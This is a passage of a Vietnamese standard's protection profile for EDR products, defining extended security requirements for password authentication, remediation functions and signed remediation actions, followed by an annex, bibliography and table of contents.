FIA_PWD_EXT.1, Xác thực mật khẩu, xác định các yêu cầu về độ dài và bộ ký tự cho các yếu tố xác thực mật khẩu.

Quản lý: FIA_PWD_EXT.1

Không có chức năng quản lý cụ thể nào được xác định.

...

Không có sự kiện có thể kiểm toán dự kiến.

FIA_PWD_EXT.1 Xác thực mật khẩu

Phân cấp thành: Không có thành phần nào khác.

Phụ thuộc vào: FIA_AUT_EXT.1 Cơ chế xác thực bảng điều khiển

FIA_PWD_EXT.1.1

EDR phải hỗ trợ những điều sau đây cho yếu tố xác thực mật khẩu:

1. Mật khẩu có thể bao gồm bất kỳ sự kết hợp nào của [lựa chọn: chữ hoa và chữ thường, [chỉ định: bộ ký tự ít nhất 52 ký tự]], số và ký tự đặc biệt: [lựa chọn: "!", "@", "#", "$" "%", "^", "&", "*", "(", ")", [chỉ định: ký tự khác]],

2. Độ dài mật khẩu lên đến [chỉ định: một số nguyên lớn hơn hoặc bằng 64] ký tự phải được hỗ trợ.

FMT_SRF_EXT Đặc tả của chức năng khắc phục

...

Phân cấp thành phần

FMT_SRF_EXT.1, Đặc tả chức năng khắc phục, liệt kê các chức năng khắc phục được hỗ trợ và xác định các phân quyền quản lý có thể thực hiện các chức năng này.

Quản lý: FMT_SRF_EXT.1

Không có chức năng quản lý cụ thể nào được xác định.

Kiểm toán: FMT_SRF_EXT.1

Không có sự kiện có thể kiểm toán nào được thấy trước.

FMT_SRF_EXT.1 Đặc tả kỹ thuật của chức năng khắc phục

Phân cấp thành: Không có thành phần nào khác.

Phụ thuộc vào: FMT_SMR.1 Phân quyền quản lý an toàn

...

EDR phải có khả năng thực hiện các chức năng khắc phục sau:

Chức năng quản lý

Quản trị

Chuyên gia phân tích SOC

Người đọc

Cách ly một điểm cuối bằng cách [lựa chọn: cách ly về mặt logic điểm cuối khỏi mạng trừ khi được cho phép, cách ly tệp độc hại trên điểm cuối]

...

Truy xuất các tệp có khả năng bị trái phép hoặc bị ảnh hưởng từ một điểm cuối

FMT_TRM_EXT Chức năng khắc phục đáng tin cậy

Các thành phần trong họ này xác định cách TOE có thể khẳng định tính xác thực của các hành động khắc phục yêu cầu từ Host Agent.

...

FMT_TRM_EXT.1, Chức năng khắc phục đáng tin cậy, yêu cầu tất cả các hoạt động quản lý được ràng buộc đối với Host Agent phải được ký số.

Quản lý: FMT_TRM_EXT.1

Không có chức năng quản lý cụ thể nào được xác định.

Kiểm toán: FMT_TRM_EXT.1

Không có sự kiện có thể kiểm toán dự kiến.

FMT_TRM_EXT.1 Chức năng khắc phục đáng tin cậy

Phân cấp thành: Không có thành phần nào khác.

Phụ thuộc vào: Không phụ thuộc.

FMT_TRM_EXT.1.1

...

Phụ lục E

(Quy định)

Các yêu cầu đáp ứng hoàn toàn

Phụ lục này liệt kê các yêu cầu mà các sản phẩm được đánh giá thành công dựa trên Hồ sơ bảo vệ này sẽ được coi là đáp ứng. Tuy nhiên, những yêu cầu này không được mô tả rõ ràng dưới dạng SFR và không được đưa vào ST. Chúng không được đưa vào như các SFR độc lập vì nó sẽ làm tăng thời gian, chi phí và độ phức tạp của việc đánh giá. Cách tiếp cận này được chấp nhận bởi TCVN 8709- 1:2011, 7.2 Sự phụ thuộc giữa các thành phần.

Thông tin này mang lại lợi ích cho các hoạt động kỹ thuật hệ thống yêu cầu đưa vào các biện pháp kiểm soát an toàn cụ thể. Đánh giá dựa trên Hồ sơ bảo vệ cung cấp bằng chứng cho thấy các biện pháp kiểm soát này hiện có và đã được đánh giá.

Yêu cầu

Cơ sở cho việc đáp ứng

FIA_UID.1 - Thời gian định danh

...

FPT_STM.1 - Dấu thời gian tin cậy

TCVN 8709-2:2011 chỉ định FPT_STM.1 là phần phụ thuộc của FAU_GEN.1 vì các bản ghi kiểm tra yêu cầu dấu thời gian đáng tin cậy để đáp ứng FAU_GEN.1.2. Sự phụ thuộc này được giải quyết hoàn toàn thông qua giả định A.PLATFORM của Hồ sơ cơ sở vì "nền tảng điện toán đáng tin cậy" được giả định là bao gồm đồng hồ hệ thống đáng tin cậy.

Thư mục tài liệu tham khảo

Protection Profile module for Endpoint Detection and Response (EDR), Hiệp hội đảm bảo thông tin quốc gia của Hoa Kỳ (NIAP), phiên bản 1.0, ngày 23/10/2020.

Mục lục

1 Phạm vi áp dụng

2 Tài liệu viện dẫn

...

4 Ký hiệu và chữ viết tắt

5 Giới thiệu Hồ sơ bảo vệ

5.1 Tổng quan

5.2 Đích đánh giá tuân thủ

5.3 Trường hợp áp dụng

6 Tuyên bố tuân thủ

7 Mô tả các vấn đề an toàn

7.1 Các mối đe dọa

7.2 Các giả định

...

8 Các mục tiêu an toàn

8.1 Mục tiêu an toàn cho TOE

8.2 Các mục tiêu an toàn đối với môi trường hoạt động

8.3 Cơ sở cho các mục tiêu an toàn

9 Các yêu cầu an toàn

9.1 Hướng dẫn yêu cầu chức năng an toàn của Hồ sơ bảo vệ cho phần mềm ứng dụng

9.2 Các yêu cầu chức năng an toàn TOE

10 Đặc điểm về tính nhất quán

Phụ lục A (Quy định) Các SFR tùy chọn

...

Phụ lục C (Tham khảo) SFR mục tiêu

Phụ lục D (Quy định) Định nghĩa thành phần mở rộng

Phụ lục E (Quy định) Các yêu cầu đáp ứng hoàn toàn

Thư mục tài liệu tham khảo